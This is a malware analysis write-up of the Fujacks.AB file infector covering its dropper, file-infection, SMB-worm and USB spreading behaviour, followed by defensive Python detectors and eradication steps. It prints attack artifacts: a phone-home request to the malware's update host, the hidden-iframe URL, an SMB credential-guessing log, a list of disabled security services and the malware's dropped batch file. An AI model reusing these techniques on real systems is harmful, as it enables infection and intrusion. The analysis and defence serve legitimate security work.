Fujacks: A Modern File Infector
Posted on 07-Apr-2018
8/6/2019 Fujacks a Modern File Infector
1/20
Fujacks: A Modern File Infector
Joel Yonts
Chief Scientist
Malicious Streams
(The Many Faces of Fujacks)

Contents
1.0 In the Early Days ... 3
2.0 Fujacks: A Malware of a Different Color ... 3
    2.1 First Impressions ... 3
    2.2 Structural Analysis ... 3
        Figure 2.2.1: File Structure of Malicious Sample ... 4
        Figure 2.2.2: PE Header #1 of Malicious Sample ... 4
        Figure 2.2.3: PE Header #2 of Malicious Sample ... 5
        Figure 2.2.4: Fujacks Infected File Tag ... 5
    2.3 Trojan-Like Behavior ... 5
        Figure 2.3.1: Dropper Trojan Infection ... 6
        Figure 2.3.2: Internet Activity Associated with Malware Infection ... 7
    2.4 A Viral Twist ... 7
        Figure 2.4.1: Viral Reproduction ... 8
    2.5 The Worm Emerges ... 8
        Figure 2.5.1: Network Worm and Local Storage Reproduction ... 9
3.0 Why File Infector Reproduction? ... 9
    3.1 Steady Hand Needed to Repair Infected Files ... 10
4.0 Detecting & Responding to Fujacks Infections ... 10
    4.1 General Defense Against File Infectors ... 10
    4.2 Fujacks Specific Defense and Eradication ... 11
5.0 Final Thoughts ... 12
Appendix A: Infection Artifacts ... 13
    Artifact 1: List of security related services disabled by Fujacks ... 13
    Artifact 2: API calls used to locate local storage infection targets ... 13
    Artifact 3: Dictionary attack against an SMB share ... 14
    Artifact 4: File operations for loading infected PE into memory ... 15
    Artifact 5: File operations for dropping original (clean) PE ... 15
    Artifact 6: File operations for dropping temporary batch file ... 16
    Artifact 7: Dropped batch file (81$$.bat) used to replace/clean infected sample.exe ... 16
    Artifact 8: File operations for dropping malicious PE ... 16
    Artifact 9: Autorun key installed at the initial startup of ncscv32.exe malware ... 17
    Artifact 10: File operations overwriting infection target with a copy of Fujacks ... 17
    Artifact 11: Temporary icon file is used to preserve original PE icon ... 18
    Artifact 12: Original PE (run.exe) is appended to new infected PE ... 18
Appendix B: Sample Fujacks PE Disinfector ... 19
    Proof-of-concept Python function for cleaning a Fujacks infected PE ... 19
1.0 In the Early Days

Back in the early days of the personal computer, the computer virus dominated the world. These tiny (cyber) life forms didn't exist in the world of infected websites and massive SPAM attacks. No, the ever-popular floppy was the medium of infection, spreading from one student or colleague to the next through the sharing of these legacy storage devices. It wasn't about stealing your money or identity in that day; it was about making a name for yourself amongst your friends and the hacker community. Then the Internet grew up, money began to flow across the massive sea of inter-connected hosts, and the REAL bad guys paid attention. We all know the story. Over time, malware authors found better ways to distribute their wares and the way of the file-infecting virus largely died out, until recently. In 2007, we began to see a rebirth in the area of file infectors. At first glance this looked like our old friend the parasitic virus, but there has been a subtle change in the DNA of these old threats. This new breed of malware took today's blended threat and added the infection capabilities of a highly contagious file infector.
2.0 Fujacks: A Malware of a Different Color

Fast forward to mid 2007. The Fujacks family of malware began to climb the infection prevalence charts. This new family was actually first discovered in late 2006, but the early variants lacked some of the advanced reproductive behaviors that allowed Fujacks to multiply its victims and gain in the ranks of the most infectious. This report will focus on one of the more evolved variants, known as Fujacks.AB.
2.1 First Impressions

One of the initial interesting things I noted about this sample is how much the classification of this malware varied across AV vendors. Even amongst the major vendors, some called the sample a Worm, others a Trojan, and others still a Virus. After analyzing the sample personally I could see why the confusion existed and how, like the horse of a different color in Oz, the sample seemed to change before my very eyes.
2.2 Structural Analysis

As many would do, my first step in analyzing this sample included taking a look under the hood and peering at the file structure, imports, and embedded strings. The file structure provided the first surprise: the sections included a very large "Extra Data" segment.
Figure 2.2.1: File Structure of Malicious Sample
Examining the contents of the extra segment revealed another PE header. A second PE header most probably indicated an embedded PE file, which would lend itself to a dropper Trojan malware structure. This would also imply a typical dropper reproduction that relies on user interaction, with probable delivery through attachments in emails and Internet downloads.
00000000  4d5a 0000 0000 0000 0000 0000 5045 0000  MZ..........PE..
00000010  4c01 0200 4653 4721 0000 0000 0000 0000  L...FSG!........
00000020  e000 8f81 0b01 0000 00da 0100 0066 0000  `........Z...f..
00000030  0000 0000 5401 0000 0010 0000 0c00 0000  ....T...........

Figure 2.2.2: PE Header #1 of Malicious Sample
00010d40  7265 7373 0034 4238 0300 4d5a 9000 0300  ress.4B8..MZ....
00010d50  0000 0400 0000 ffff 0000 b800 0000 0000  ..........8.....
00010d60  0000 4000 0000 0000 0000 0000 0000 0000  ..@.............
00010d70  0000 0000 0000 0000 0000 0000 0000 0000  ................
00010d80  0000 0000 0000 8000 0000 0e1f ba0e 00b4  ............:..4
00010d90  09cd 21b8 014c cd21 5468 6973 2070 726f  .M!8.LM!This pro
00010da0  6772 616d 2063 616e 6e6f 7420 6265 2072  gram cannot be r
00010db0  756e 2069 6e20 444f 5320 6d6f 6465 2e0d  un in DOS mode..
00010dc0  0d0a 2400 0000 0000 0000 5045 0000 4c01  ..$.......PE..L

Figure 2.2.3: PE Header #2 of Malicious Sample
Another interesting note was the existence of a "WHBOY" string at the very end of the file.
Addr      0 1  2 3  4 5  6 7  8 9  A B  C D  E F   0 2 4 6 8 A C E
--------  ---- ---- ---- ---- ---- ---- ---- ----  ----------------
0001d100  0000 0000 0000 0000 0000 0000 0000 0000  ................
0001d110  0000 0000 0000 0000 0000 0000 0000 0000  ................
0001d120  0000 0000 0000 0000 0000 0000 0000 0000  ................
0001d130  0000 0000 0000 0000 0000 0000 0000 0000  ................
0001d140  0000 0000 0000 0000 0000 0057 4842 4f59  ...........WHBOY
0001d150  7275 6e2e 6578 652e 6578 6502 3530 3137  run.exe.exe.5017
0001d160  3601                                     6.

Figure 2.2.4: Fujacks Infected File Tag
This string and the following filename/filesize combination turned out to be a tag added by Fujacks that contains the original name and original size of the infected file. In the dump above the tag reads WHBOY, then run.exe.exe (the original name run.exe with a second .exe appended), a 0x02 separator, the original size 50176 in ASCII decimal, and a terminating 0x01 byte.

Examining embedded strings and the import table revealed little of interest. Imports were very light, with GetProcAddress and LoadLibrary being the only imported functions. (This is consistent with the "FSG!" marker in the first header in Figure 2.2.2: FSG is a compression packer, not a cryptographic one, and FSG-packed executables import only these two functions and resolve the rest at run time.) Strings were fairly standard, with the only anomaly being the recurring string WhBoy.
2.3 Trojan-Like Behavior

Taking high-level structural analysis and speculation only so far, my next step was to run the sample in a controlled environment. Upon execution, the malware sample separated the two PE files by dropping a disinfected copy of the carrier program locally and by dropping a malicious PE file in the %SYSTEM%/drivers directory. At the end of this process the infected sample was deleted and both the disinfected carrier PE and the malicious PE were executed. The end result: the user sees the program they executed (no alteration of the user experience) while the malicious PE runs silently in the background. Furthermore, the malicious PE was set to restart each time the computer restarts, to maintain a persistent infection.
Figure 2.3.1: Dropper Trojan Infection

Diagram text for Figure 2.3.1:
sample.exe (infected): prepended malware PE + original sample.exe + appended infection tag
Initial Execution
  1. User execution
  2. Process startup
  3. sample.exe loaded into memory (heap: Fujacks tag, sample.exe, ncscv32.exe)
Disinfect Dropper
  4. Original (clean) PE dropped from memory as sample.exe.exe
  5. Temp batch file ($$.bat) dropped from memory into %TEMP%/
  6. .bat deletes sample.exe (infected)
  7. .bat renames sample.exe.exe (clean) to sample.exe
  8. .bat starts new sample.exe (clean) and deletes itself
Install Malware
  9. Malware PE dropped from memory as %SYSTEM%/drivers/ncscv32.exe
  10. Newly dropped malware is executed
  11. Malware PE installs autorun key (HKEY_USERS\...\Run\ncscv32)
  12. Infected sample.exe process exits

At this point I had seen the anticipated dropper Trojan behavior and could understand the Trojan classification. Another anticipated behavior was the Internet activity observed directly following the installation of the malicious PE. The exact purpose behind the Internet access was not determined during the analysis, due to the remote site being off the air. From the HTTP request it was easy to speculate that additional malware, or at least an upgrade of the existing malware, was the initial intent.
DNS Query:    www.whboy.net
DNS Response: 69.64.155.133

HTTP GET Request:
GET /update/wormcn.txt HTTP/1.1
User-Agent: QQ
Host: www.whboy.net
Cache-Control: no-cache

Figure 2.3.2: Internet Activity Associated with Malware Infection
2.4 A Viral Twist

Just as I was ready to declare this sample a Trojan, I noticed it began to multiply! The malicious PE was multi-threaded, with several of its threads intent on spreading the malicious code.

First, it scanned local volumes looking for PE (exe), asp, aspx, jsp, htm, and html files. Once the malware identified a victim, an infection process began. PE files were prepended with a complete copy of the newly installed malware, while web files were appended with a malicious iframe that would secretly direct all who viewed the web content to a malicious download site. After the infection process, many of the PE files residing on the system became Trojans with the same layout as our original sample. One odd note about the PE infection was that only target PEs with embedded icon resources were infected. I believe this to be a shortcoming in the coding of this Fujacks variant. Earlier variants infected all PE files but changed all infected files to a standard icon supplied by Fujacks. The AB variant implemented logic to preserve the original icon using temp files and a reload process. Apparently adding this logic altered the logic used to select infection targets.

Another artifact of the Fujacks infection process was the tagging of previously scanned/infected directories. After multiple restarts of the dropped malicious PE, I discovered the file infection process would always resume in the directory where it last visited. Knowing this persistence of information must be maintained on disk, I discovered the Desktop__.ini file. This file was dropped in each directory as Fujacks recursively scanned the file system looking for infection victims. The file was set to System, Hidden, and Read-only to hide its presence, and simply contained the YYYY-MM-DD of the last scan by Fujacks. Each time the malicious PE was restarted it would recursively scan the file system and skip any directory that contained a Desktop__.ini file with the current date, effectively resuming the system scan from the last directory visited.
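The web-file side of the infection is easier to detect and undo than the PE side, because nothing has to be carved out of the middle of the file: the injected markup is simply appended. The following Python is an added example written for this edit, not code from the report. It flags and strips a trailing iframe that references www.lovebak.com, the site named in the detection list of Section 4.2. The report gives the URL but not the exact markup Fujacks appends, so the pattern is an assumption: a single iframe element whose tag mentions that host, sitting at the very end of the file. The sample pages and the directory layout are constructed for the demonstration, and the function names are mine.

```python
import re
import tempfile
from pathlib import Path

# Extensions the report says Fujacks appends its iframe to.
WEB_EXTS = {".asp", ".aspx", ".jsp", ".htm", ".html"}

# Assumption (the report names the URL http://www.lovebak.com/qq.htm but not
# the markup): the injection is one <iframe ...>...</iframe> element whose tag
# references lovebak.com, appended at the end of the file and followed only by
# whitespace. Matching the host instead of the full URL keeps the check
# tolerant of attribute order and of the width/height tricks used to hide it.
IFRAME_RE = re.compile(
    rb"<iframe\b[^>]*lovebak\.com[^>]*>.*?</iframe>\s*\Z",
    re.IGNORECASE | re.DOTALL,
)


def find_injected_iframe(content: bytes):
    """Return the regex match for the appended Fujacks iframe, or None."""
    return IFRAME_RE.search(content)


def strip_injected_iframe(content: bytes) -> bytes:
    """Drop the trailing injected iframe; any other iframe in the page stays."""
    m = IFRAME_RE.search(content)
    return content if m is None else content[: m.start()]


def clean_tree(root: Path, dry_run: bool = True):
    """Walk root and return the infected web files found.

    With dry_run=False each hit is first copied to <name>.infected (so the
    evidence survives) and then overwritten with the stripped content.
    """
    hits = []
    for p in root.rglob("*"):
        if not p.is_file() or p.suffix.lower() not in WEB_EXTS:
            continue
        data = p.read_bytes()
        if find_injected_iframe(data) is None:
            continue
        hits.append(p)
        if not dry_run:
            p.with_name(p.name + ".infected").write_bytes(data)
            p.write_bytes(strip_injected_iframe(data))
    return hits


# --- constructed sample pages (not taken from an infected host) -------------
CLEAN_PAGE = (b"<html><body><p>Quarterly report</p>\n"
              b'<iframe src="https://example.org/widget"></iframe>\n'  # legitimate
              b"</body></html>\n")
INJECTED_PAGE = CLEAN_PAGE + (
    b'<iframe src="http://www.lovebak.com/qq.htm" width="0" height="0">'
    b"</iframe>\r\n"
)


def demo() -> dict:
    """Lay out a small tree, scan it, clean it, and report what happened."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "site").mkdir()
        (root / "site" / "index.html").write_bytes(INJECTED_PAGE)
        (root / "site" / "about.aspx").write_bytes(CLEAN_PAGE)
        (root / "site" / "notes.txt").write_bytes(INJECTED_PAGE)  # not a web file
        before = sorted(p.name for p in clean_tree(root, dry_run=True))
        cleaned = sorted(p.name for p in clean_tree(root, dry_run=False))
        after = clean_tree(root, dry_run=True)
        restored = (root / "site" / "index.html").read_bytes() == CLEAN_PAGE
        backup = (root / "site" / "index.html.infected").exists()
        return {"before": before, "cleaned": cleaned, "after": len(after),
                "restored": restored, "backup": backup}


if __name__ == "__main__":
    print(demo())
```

The scan works on bytes rather than decoded text so that pages in any encoding survive the round trip unchanged; only the matched tail is cut. A legitimate iframe earlier in the page is untouched because the pattern requires the lovebak.com reference inside the tag itself and the match to run to end of file.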
Figure 2.4.1: Viral Reproduction

Diagram text for Figure 2.4.1:
ncscv32.exe (fujacks), running from %SYSTEM%/drivers/
Infection Targets
  1. Searches for PE, html, and aspx files, dropping Desktop__.ini (System, Hidden, RO) in each directory
     * Skips a directory if Desktop__.ini is present and has the current date
Infect PE Files (target.exe)
  2. target.exe loaded into memory (heap: Fujacks tag, target.exe, ncscv32.exe, icon)
  3. Icon resource of target.exe written to temp file %TEMP%/$$.ico
  4. Overwrite target.exe with a copy of ncscv32.exe
  5. Icon set to original icon using temp file
  6. Append file with target.exe from memory
  7. Append Fujacks specific tag
  Result: target.exe (infected)
Infect Web Files (.asp, .aspx, .jsp, .htm, .html)
  2a. Append infectious iframe to each file

At this point I had seen a file infector type of reproduction that has historically been associated with a computer virus. So if we stopped the story here I would be comfortable with the Trojan and Virus classifications, but not network Worm.

2.5 The Worm Emerges

Not content with the native soil being conquered, however, several threads of the malicious PE began a systematic sweep of the local subnet looking for other machines with SMB sharing enabled. If a victim was located, the malicious PE began a limited dictionary attack against the SMB share (Artifact 3 shows the pairs tried: a blank password and 1234 for each of Administrator, Guest, admin, and Root). If the target machine had an open share or weak password, the malicious PE compromised the remote system by placing a copy of itself (named Setup.exe) on the remote system, with an Autorun.inf alongside it, so that it would automatically start if a user browsed the target drive. To further the compromise, the malicious PE also began a recursive sweep of the remote file system looking for additional PE and web files to infect using the same process noted above.
A nearly identical infection process occurred for attached storage such as USB drives and iPods. The only variation was the name (GameSetup.exe) used for the dropped malicious PE.

Figure 2.5.1: Network Worm and Local Storage Reproduction

Diagram text for Figure 2.5.1:
ncscv32.exe (fujacks) on the local system
Network SMB Infection (remote system: file server or workstation, over SMB)
  1a. Multiple threads search for and attack SMB shares using a basic dictionary attack
  2a. Drop Setup.exe & Autorun.inf on the remote system ([NET DRIVE]:\Setup.exe, [NET DRIVE]:\Autorun.inf)
  3a. Search & infect remote system .exe, .html, and .aspx files ([NET DRIVE]:*\*.exe, *.html, *.aspx)
Attached Storage Infection (USB devices)
  1. Multiple threads locate attached storage
  2. Drop GameSetup.exe & Autorun.inf ([DRIVE]:\GameSetup.exe, [DRIVE]:\Autorun.inf)
  3. Search & infect .exe, .html, and .aspx files ([DRIVE]:*\*.exe, *.html, *.aspx)

So now we see the worm behavior noted by several AV researchers. It is easy to see that this malware species has a complicated lifecycle, which explains the naming convention confusion.

3.0 Why File Infector Reproduction?

As I alluded to earlier, we began with the age of the virus, endured the onslaught of the network worm age, and seemingly have settled into the age of the Trojan. I know things are not so cut and dried, but generally I believe this classification of eras holds true. If I could point to one thing that has been good about our current age of the Trojan, it is that infections stay put! If a Trojan gets through perimeter defenses and infects a corporate (or home) user's PC, the infection will be contained and only the data flowing through or around this machine is at risk. This was a huge relief after the geometric reproduction of the network worm era. However, the blended threat that Fujacks brings to the table gives the attackers the best of multiple worlds. With this attack, they can utilize the robust functionality and stealth of a Trojan during penetration and become cyber cockroaches scurrying from one internal machine to the next once they penetrate. Reintroducing the reproductive threat may be a major contributor to the resurgence in file infectors such as Fujacks.
Along those same lines, the proliferation of USB thumb drives and personal MP3 players such as iPods has made the USB infector portion of the Fujacks malware an attractive addition. This vector also paves the way for future non-conventional targets. In the near future your printers, household appliances, car, etc. may be infected with a Fujacks-like malware because of their local storage capabilities.

One final note on the reproductive behavior worth highlighting is the web file infection vector. This vector has far-reaching potential for infection if web content that is hosted Internet- or corporate intranet-facing is in the path of infection. All that is required is for a web server, web content file server, or web developer to become infected with Fujacks through one of the many infection vectors, and the potential for infecting customers, business associates, and friends greatly increases.
3.1 Steady Hand Needed to Repair Infected Files

Beyond reproductive behavior, another motive for the resurgence may be the additional complication and time required to contain and clean infection outbreaks. With a Trojan, simply deleting the offending file and supporting registry keys may be enough to eradicate the threat. In the world of file infectors, the infection may be attached to your business-critical documents, attached to the web content that provides 100% of your revenue, or to your single copy of the term paper due tomorrow. Disinfecting file infectors most often involves slicing and dicing your treasured files and removing the malicious components without harming the known-good content. Obviously the need for accuracy is critical, with little tolerance for error. This extra time can prolong the infection by hours if not days. Whether this aspect of file infectors is a primary motive or a by-product, the attacker community is the one benefiting.
4.0 Detecting & Responding to Fujacks Infections

4.1 General Defense Against File Infectors

No malware analysis write-up would be complete without a defense section. All things considered, Fujacks is still a fairly easy family to guard against. The family does not utilize a cryptographic packer, it is light on anti-debugging techniques, and the file changes are easy to detect. At a summary level, the same key elements of defense against general malware threats hold true. Specifically, network-based anti-malware + IPS and host-based anti-malware + IPS form the core defense. Additional technology needed for a holistic defense includes:
- Monitoring & filtering of entry points such as www & email
- Network monitoring tools identifying top talkers & suspicious flows
- Data Loss Prevention solutions
- File integrity monitoring
- Network & host white-listing
4.2 Fujacks Specific Defense and Eradication

In addition to these general defense guidelines, searching for any of the artifacts noted in Appendix A would provide a good detective control.

Infection Artifacts - Detection
- Presence of a new file in %SYSTEM%/drivers named ncscv32.exe
- Presence of an unknown system process named ncscv32
- Presence of an nvscv32 registry value set in the \Windows\CurrentVersion\Run key
- Presence of a system, hidden, read-only file named Desktop__.ini located in potentially infected directories
- Presence of a hidden iframe accessing http://www.lovebak.com/qq.htm appended to asp, aspx, jsp, htm and html files
- Presence of GameSetup.exe and Setup.exe on local storage devices and network shares
- Unexplained $$.bat and $$.ico files in the user's %TEMP% directory
- Email attachment or file download that contains two PE headers. Some generic anti-malware signatures can detect double PEs as a potential dropper Trojan.
- PE files suddenly growing in size (approximately 60K; for this sample the 68,938-byte ncscv32.exe plus a 24-byte trailer, see Artifacts 8 and 12) and ending with the ASCII tag described in Section 2.2: WHBOY, the original file name with .exe appended, and the original size. Do not rely on the modified timestamp to spot the growth: Artifact 10 shows the infector calling SetBasicInformationFile to set LastWriteTime on the overwritten target.
- Unexplained SMB network connection attempts to other systems on the LAN
- Phone-home HTTP activity to www.lovebak.com and/or www.whboy.net
- Many of the Fujacks variants changed the icon of all infected files. I can't explain this in any other way except sloppiness on the virus writer's part. This should be a huge red flag to end users.
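Before handing a suspect file to the disinfector in Appendix B, or trusting a "grew by about 60K" heuristic, a responder wants to confirm that the file really has the Fujacks layout and that the numbers in the trailer agree with the file. The Python below is an added example written for this edit, not code from the report. It parses the trailer described in Section 2.2 and checks that the offset it implies for the original PE actually lands on a PE header. The layout it assumes, original PE followed by one separator byte and then WHBOY<name>.exe<0x02><size><0x01>, is taken from Figure 2.2.4 and the offsets in Artifact 12 (68,938 + 50,176 + 1 + 23 = 119,138, the size in Artifact 4). The two PE images used here are constructed stand-ins that carry only the MZ/PE markers the checker inspects, and the function names are mine.

```python
import re
import struct

# Trailer layout observed in the report (Figure 2.2.4, Artifact 12):
#   [Fujacks PE][original PE][1 separator byte]WHBOY<name>.exe\x02<size>\x01<EOF>
# <name> is the original file name (run.exe in the sample) with an extra
# ".exe" appended; <size> is the original PE size in ASCII decimal.
TAG_RE = re.compile(
    rb"WHBOY(?P<name>.+?\.exe)\.exe\x02(?P<size>[0-9]+)\x01\Z", re.DOTALL
)
MAX_TAG = 256  # same window the Appendix B disinfector searches


def parse_tag(data: bytes):
    """Return (original name, original size, tag length), or None if untagged."""
    m = TAG_RE.search(data[-MAX_TAG:])
    if m is None:
        return None
    return m.group("name").decode("latin-1"), int(m.group("size")), len(m.group(0))


def looks_like_pe(data: bytes, off: int) -> bool:
    """Minimal PE check: 'MZ' at off and 'PE\\0\\0' where e_lfanew points."""
    if off < 0 or data[off:off + 2] != b"MZ" or off + 0x40 > len(data):
        return False
    e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
    sig = off + e_lfanew
    return data[sig:sig + 4] == b"PE\x00\x00"


def check_infected(data: bytes):
    """Describe the Fujacks layout of data, or return None if there is no tag.

    The original PE is assumed to sit immediately before the separator byte
    and the tag, so its offset (which is also the size of the prepended
    malware) follows from the file length, the tag length and the tagged size.
    """
    tag = parse_tag(data)
    if tag is None:
        return None
    name, size, tag_len = tag
    orig_off = len(data) - tag_len - 1 - size
    return {
        "orig_name": name,
        "orig_size": size,
        "orig_offset": orig_off,
        "carrier_is_pe": looks_like_pe(data, 0),
        "orig_is_pe": looks_like_pe(data, orig_off),
    }


# --- constructed test fixtures (not samples from the report) -----------------
def fake_pe(filler: bytes, size: int) -> bytes:
    """A stand-in PE: 'MZ', e_lfanew = 0x40, 'PE\\0\\0' at 0x40, then filler."""
    hdr = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00"
    body = (filler * (size // len(filler) + 1))[: size - len(hdr)]
    return hdr + body


def build_infected(malware: bytes, original: bytes, orig_name: str) -> bytes:
    """Assemble an image with the trailer layout described above."""
    tag = (b"WHBOY" + orig_name.encode() + b".exe\x02"
           + str(len(original)).encode() + b"\x01")
    return malware + original + b"\x00" + tag


MALWARE = fake_pe(b"MAL", 1000)
ORIGINAL = fake_pe(b"ORIG", 700)
INFECTED = build_infected(MALWARE, ORIGINAL, "run.exe")

if __name__ == "__main__":
    print(check_infected(INFECTED))   # orig_offset 1000 == len(MALWARE)
    print(check_infected(ORIGINAL))   # None: no trailer
```

For a real file, call check_infected(open(path, "rb").read()). A result with both PE flags set and a non-negative offset is a file the Appendix B disinfector can carve; a tag whose implied offset does not land on an MZ header means the size field was tampered with or the layout differs from this variant, and the file should be restored from backup instead.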
Infection Artifacts - Eradication
- Check with your AV vendor for the latest signatures and detection heuristics. If your AV company currently doesn't have coverage, attempt to create a custom signature and submit a sample for their analysis.
- Determine phone-home & malicious download sites and block them at your network or host firewall. In this case www.lovebak.com and www.whboy.net should be blocked.
- Kill the malicious process ncscv32, delete ncscv32.exe from the %SYSTEM%/drivers directory, and remove the autorun value nvscv32 from \Windows\CurrentVersion\Run.
- Search all local storage and delete instances of GameSetup.exe and the supporting Autorun.inf entry.
- Search all network shares and delete malicious instances of Setup.exe (use www.virustotal.com if necessary to ensure valid Setup.exe files are not deleted).
- If possible, disable open shares and set strong passwords for the remaining network shares.
- Search all web files for the presence of www.lovebak.com and restore them from a backup, or remove the appended iframe string if infected.
- Restore infected PE files from a backup or create a custom disinfector (Appendix B). Do this only after the running ncscv32 process and its autorun value are gone: any infected PE executed before that point re-drops the malware (Section 2.3).

5.0 Final Thoughts
While researching classic file infectors, I came across one species that had a similar infected file format to Fujacks. The species was called W32/Sand.12300 and was discovered in 2003. Like Fujacks, files infected with Sand.12300 separate the original PE and the malicious code into separate files at run time. After separation both files are executed, again resembling the execution of a Fujacks infected file. Could Sand.12300 be the inspiration for the design of Fujacks?

Regardless of its ancestry, the Fujacks family is certainly an interesting malware group that has a complicated reproductive cycle. I would still consider this almost a proof-of-concept for what could be a serious threat when combined with other advanced techniques such as rootkit technology and alternate data streams. A healthy focus from our security product providers and incident responders on how to deal with today's file infectors will pay dividends and help ensure we are well prepared for the next evolution.
Diagram text (Amoeba infector): layout of a file infected by the Amoeba virus W32/Sand.12300: Malicious Code (Head), Program Code, Malicious Code (Tail).
Appendix A: Infection Artifacts

Attempts to access service "Schedule".
Attempts to access service "sharedaccess".
Attempts to access service "RsCCenter".
Attempts to access service "RsRavMon".
Attempts to access service "RsCCenter".
Attempts to access service "RsRavMon".
Attempts to access service "KVWSC".
Attempts to access service "KVSrvXP".
Attempts to access service "KVWSC".
Attempts to access service "KVSrvXP".
Attempts to access service "kavsvc".
Attempts to access service "AVP".
Attempts to access service "AVP".
Attempts to access service "kavsvc".
Attempts to access service "McAfeeFramework".
Attempts to access service "McShield".
Disables security related services.

Artifact 1: List of security related services disabled by Fujacks
00666 0x0041D3FD=KERNEL32!GetDriveTypeA ("A:\")
00667 0x0041D3FD=KERNEL32!GetDriveTypeA ("B:\")
00668 0x0041D3FD=KERNEL32!GetDriveTypeA ("C:\")
00669 0x0041D3FD=KERNEL32!GetDriveTypeA ("D:\")
00670 0x0041D3FD=KERNEL32!GetDriveTypeA ("E:\")
00671 0x0041D3FD=KERNEL32!GetDriveTypeA ("F:\")
(omitted for brevity)
00685 0x0041D3FD=KERNEL32!GetDriveTypeA ("T:\")
00686 0x0041D3FD=KERNEL32!GetDriveTypeA ("U:\")
00687 0x0041D3FD=KERNEL32!GetDriveTypeA ("V:\")
00688 0x0041D3FD=KERNEL32!GetDriveTypeA ("W:\")
00689 0x0041D3FD=KERNEL32!GetDriveTypeA ("X:\")
00690 0x0041D3FD=KERNEL32!GetDriveTypeA ("Y:\")
00691 0x0041D3FD=KERNEL32!GetDriveTypeA ("Z:\")
00692 0x7C809463=KERNEL32!Sleep (0x00000000)

Artifact 2: API calls used to locate local storage infection targets
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"","Administrator",0x00000000)
0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" with username=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"1234","Administrator",0x00000000)
0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" with username=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"","Guest",0x00000000)
0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" with username=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"1234","Guest",0x00000000)
0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" with username=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"","admin",0x00000000)
0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" with username=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"1234","admin",0x00000000)
0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" with username=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"","Root",0x00000000)
0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" with username=%s and password=%s",0x201D2A20....)
0x0041CBF8=MPR!WNetAddConnection2A (0x4FDFBF18,"1234","Root",0x00000000)
0x733D1308=USER32!wsprintfA (0x4FDFBCE8,"Connection to resource "%s" with username=%s and password=%s",0x201D2A20....)
0x0041CC1F=MPR!WNetCancelConnectionA ("\\10.0.0.116",0xFFFFFFFF)
0x0041D10D=KERNEL32!Sleep (0x00000200)

Artifact 3: Dictionary attack against an SMB share
Process Name  Operation                     Target            Detail
sample.exe    ReadFile                      C:\mw\sample.exe  Offset: 0, Length: 20,480
sample.exe    QueryStandardInformationFile  C:\mw\sample.exe  AllocationSize: 122,880, EndOfFile: 119,138, NumberOfLinks: 1, DeletePending: False, Directory: False
sample.exe    ReadFile                      C:\mw\sample.exe  Offset: 20,480, Length: 20,480
sample.exe    QueryStandardInformationFile  C:\mw\sample.exe  AllocationSize: 122,880, EndOfFile: 119,138, NumberOfLinks: 1, DeletePending: False, Directory: False
sample.exe    ReadFile                      C:\mw\sample.exe  Offset: 40,960, Length: 20,480
sample.exe    QueryStandardInformationFile  C:\mw\sample.exe  AllocationSize: 122,880, EndOfFile: 119,138, NumberOfLinks: 1, DeletePending: False, Directory: False
sample.exe    ReadFile                      C:\mw\sample.exe  Offset: 61,440, Length: 20,480
sample.exe    QueryStandardInformationFile  C:\mw\sample.exe  AllocationSize: 122,880, EndOfFile: 119,138, NumberOfLinks: 1, DeletePending: False, Directory: False
sample.exe    ReadFile                      C:\mw\sample.exe  Offset: 81,920, Length: 20,480
sample.exe    QueryStandardInformationFile  C:\mw\sample.exe  AllocationSize: 122,880, EndOfFile: 119,138, NumberOfLinks: 1, DeletePending: False, Directory: False
sample.exe    ReadFile                      C:\mw\sample.exe  Offset: 102,400, Length: 16,738
sample.exe    QueryStandardInformationFile  C:\mw\sample.exe  AllocationSize: 122,880, EndOfFile: 119,138, NumberOfLinks: 1, DeletePending: False, Directory: False
sample.exe    CloseFile                     C:\mw\sample.exe

Artifact 4: File operations for loading infected PE into memory
Process Name  Operation  Target                Detail
sample.exe    WriteFile  C:\mw\sample.exe.exe  Offset: 0, Length: 128
sample.exe    WriteFile  C:\mw\sample.exe.exe  Offset: 128, Length: 128
sample.exe    WriteFile  C:\mw\sample.exe.exe  Offset: 128, Length: 128
sample.exe    WriteFile  C:\mw\sample.exe.exe  Offset: 256, Length: 128
sample.exe    WriteFile  C:\mw\sample.exe.exe  Offset: 256, Length: 128
sample.exe    WriteFile  C:\mw\sample.exe.exe  Offset: 384, Length: 128
(...)
sample.exe    WriteFile  C:\mw\sample.exe.exe  Offset: 49,792, Length: 128
sample.exe    WriteFile  C:\mw\sample.exe.exe  Offset: 49,920, Length: 128
sample.exe    WriteFile  C:\mw\sample.exe.exe  Offset: 50,048, Length: 128
sample.exe    CloseFile  C:\mw\sample.exe.exe
** (...) represents repeating operations

Artifact 5: File operations for dropping original (clean) PE
Process Name  Operation  Target                                                       Detail
sample.exe    WriteFile  C:\Documents and Settings\***\Local Settings\Temp\81$$.bat  Offset: 0, Length: 128
sample.exe    WriteFile  C:\Documents and Settings\***\Local Settings\Temp\81$$.bat  Offset: 128, Length: 43
sample.exe    WriteFile  C:\Documents and Settings\***\Local Settings\Temp\81$$.bat  Offset: 128, Length: 43
sample.exe    CloseFile  C:\Documents and Settings\***\Local Settings\Temp\81$$.bat

Artifact 6: File operations for dropping temporary batch file
:try1
del "C:\mw\sample.exe"
if exist "C:\mw\sample.exe" goto try1
ren "C:\mw\sample.exe.exe" "run.exe"
if exist "C:\mw\sample.exe.exe" goto try2
"C:\mw\sample.exe"
:try2
del %0

